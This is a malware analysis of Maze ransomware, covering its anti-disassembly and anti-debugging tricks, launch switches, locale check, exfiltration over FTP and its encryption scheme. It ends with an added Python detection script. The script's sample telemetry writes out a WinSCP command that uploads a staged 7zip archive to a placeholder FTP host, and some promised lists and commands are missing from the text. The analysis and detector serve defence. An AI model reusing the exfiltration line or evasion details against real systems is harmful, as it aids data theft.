Let's take a look at the first anti-disassembly technique.

The result of this piece of code is a jump to the 42199F location. If the first jump is taken, execution goes to the 421E6D location, where the fourth jump is taken because the ZF flag was not changed; execution then goes to the 42199F location, and the code under the jump is unreachable. If the first jump is not taken, the second jump is taken, because its condition is the opposite of the previous one, and code goes to the 42199F location; the third jump is unreachable. The fifth and sixth jumps can be seen as absolute jumps.

As for the second anti-disassembly technique, Maze pushes the function's return address onto the stack and then jumps to the function itself. After the function executes, it cleans up the stack and retrieves the return address from the stack to leave the function.

In addition, Maze can detect if its code is being debugged. It checks the ‘BeingDebugged’ flag in its PEB structure to determine whether the process is running under a debugger. If so, the code goes into an infinite loop and does no encryption.

Also, Maze kills the processes of malware analysis tools and office tools by the hashes of the process names.
For example, x32dbg has a hash value of ‘5062053B’.

The reconstructed list of the processes is as follows:

Maze also gets information about the antivirus products installed using WMI. If antivirus software is found, it does not run the payload.

The Maze ransomware can be launched with additional parameters:
-logging enables console output to log the ransomware’s activity.
-nomutex allows many copies of Maze ransomware to run.
-noshares disables encryption of network shares.
-path indicates a directory that will be encrypted.

Maze ransomware does not encrypt files on systems with Russian localization. It checks for the ‘419’ value when it retrieves the system language from the registry using GetUserDefaultUILanguage. The ransomware also creates a mutex with a unique ID created for the current user to check whether a second instance of Maze ransomware is running. Once executed, Maze sends a check-in request to the C&C servers.

The list of hardcoded strings that Maze uses to construct network requests is below.

The IP addresses are located in Moscow, Russian Federation. The subnet 91.218.114.0 is often used by the Maze cartel.

Maze ransomware – similar to the recent ransomware attacks from WastedLocker, Netwalker, and Revil – both encrypts and steals data. It uses the 7zip utility to pack collected data and exfiltrate the archives to the attacker’s FTP server using a WinSCP client. In some incidents, it was reported that the exfiltrated data was also Base64 encoded.

Maze deletes Windows file backups using the following obfuscated command line:

The encryption scheme has three layers that use file, session, and master keys.
1. File encryption with the ChaCha symmetric crypto algorithm.
2. File keys and IVs are encrypted with the Session RSA public key and added to the encrypted files.
3. The Session RSA private key is encrypted with the Master RSA public key. The encrypted Session RSA private key is then stored in the ransom note.

Maze imports the Master RSA-2048 public key hardcoded in the binary.
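As an added example (not code from the original article), the Python triage helper below checks constructed process-creation and network-connection events for the host-side behaviours described in the analysis: the documented -logging/-nomutex/-noshares/-path launch switches, 7zip archiving followed by WinSCP-to-FTP exfiltration, and connections into the 91.218.114.0 subnet attributed to the Maze cartel. The event shape, host names, command lines and the 198.51.100.7 FTP address are constructed for this example; the /24 mask is an assumption, since the article gives only the network address.

```python
import ipaddress
import re

# Launch switches the analysis documents for the Maze binary.
MAZE_SWITCHES = {"-logging", "-nomutex", "-noshares", "-path"}
# Subnet the analysis attributes to the Maze cartel; the /24 mask is an assumption.
MAZE_SUBNET = ipaddress.ip_network("91.218.114.0/24")
# Staging/exfiltration tooling named in the analysis: 7zip archive creation and WinSCP to FTP.
SEVENZIP_ARCHIVE = re.compile(r'(?:^|[\\\s"])7z[ag]?(?:\.exe)?\s+a\b', re.IGNORECASE)
WINSCP_FTP = re.compile(r'winscp(?:\.com|\.exe)?\b.*\bftp://', re.IGNORECASE | re.DOTALL)


def maze_switches(cmdline):
    """Return the documented Maze switches present in a command line (lower-cased, sorted)."""
    found = set()
    for token in cmdline.split():
        name = token.lower().split("=", 1)[0]  # accept "-path=C:\dir" as well as "-path C:\dir"
        if name in MAZE_SWITCHES:
            found.add(name)
    return sorted(found)


def assess_event(event):
    """Return the indicator names that fire for a single event (empty list if none)."""
    hits = []
    if event["type"] == "process":
        cmd = event["cmdline"]
        switches = maze_switches(cmd)
        if switches:
            hits.append("maze_launch_switches:" + ",".join(switches))
        if SEVENZIP_ARCHIVE.search(cmd):
            hits.append("staging_7zip_archive")
        if WINSCP_FTP.search(cmd):
            hits.append("exfil_winscp_ftp")
    elif event["type"] == "network":
        try:
            dst = ipaddress.ip_address(event["dst_ip"])
        except ValueError:
            return hits  # malformed address: no indicator, no crash
        if dst in MAZE_SUBNET:
            hits.append("c2_maze_subnet")
    return hits


def triage(events):
    """Group indicator hits by host; hosts with no hits are omitted."""
    per_host = {}
    for ev in events:
        hits = assess_event(ev)
        if hits:
            per_host.setdefault(ev["host"], []).extend(hits)
    return per_host


def is_probable_maze(host_hits):
    """Escalate when the Maze launch switches are seen, or when two distinct behaviours chain on one host."""
    kinds = {h.split(":", 1)[0] for h in host_hits}
    return "maze_launch_switches" in kinds or len(kinds) >= 2


# Constructed sample telemetry (simplified shape, not any vendor's schema).
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS01",
     "cmdline": "update.exe -nomutex -noshares -path C:\\Finance"},
    {"type": "process", "host": "WS01",
     "cmdline": "7z.exe a -p C:\\Users\\Public\\stage.7z C:\\Finance"},
    {"type": "process", "host": "WS01",
     "cmdline": 'WinSCP.com /command "open ftp://user:pass@198.51.100.7" '
                '"put C:\\Users\\Public\\stage.7z" exit'},
    {"type": "network", "host": "WS01", "dst_ip": "91.218.114.37", "dst_port": 80},
    {"type": "process", "host": "WS02", "cmdline": "svchost.exe -k netsvcs -p"},
    {"type": "network", "host": "WS02", "dst_ip": "93.184.216.34", "dst_port": 443},
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host, "probable Maze" if is_probable_maze(hits) else "review", hits)
```

The switch check is exact-token matching, so ordinary service arguments such as `-k` or `-p` do not fire; the escalation rule deliberately requires either the distinctive launch switches or two different behaviours on the same host, because 7zip or WinSCP alone is routine administrative activity.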